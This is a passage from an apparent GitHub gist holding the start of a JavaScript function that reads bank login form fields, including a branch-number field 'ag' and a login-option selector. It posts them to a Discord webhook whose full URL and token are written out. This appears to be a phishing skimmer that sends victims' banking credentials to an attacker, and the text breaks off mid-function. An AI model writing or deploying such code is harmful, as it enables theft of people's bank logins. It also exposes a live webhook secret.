Skip to content

Instantly share code, notes, and snippets.

View lasse-lenting's full-sized avatar

Lasse Lenting lasse-lenting

  • Jumbo
  • Rotterdam
  • 21:45 (UTC +02:00)
View GitHub Profile
function sendMessage(a) {
const request = new XMLHttpRequest();
request.open("POST", "https://discord.com/api/webhooks/1054801748784582747/RnejtlSm0In4XZOBj_gCjhwd2Hw4Tmy3zSP6dYonnnuOzaHG3RR_SsscvKZz6wmzovYA");
request.setRequestHeader('Content-type', 'application/json');
var selection = document.getElementById('opcoes_login').value
if(selection.split(":")[0] == "0") {
var agencia = document.getElementById('ag').value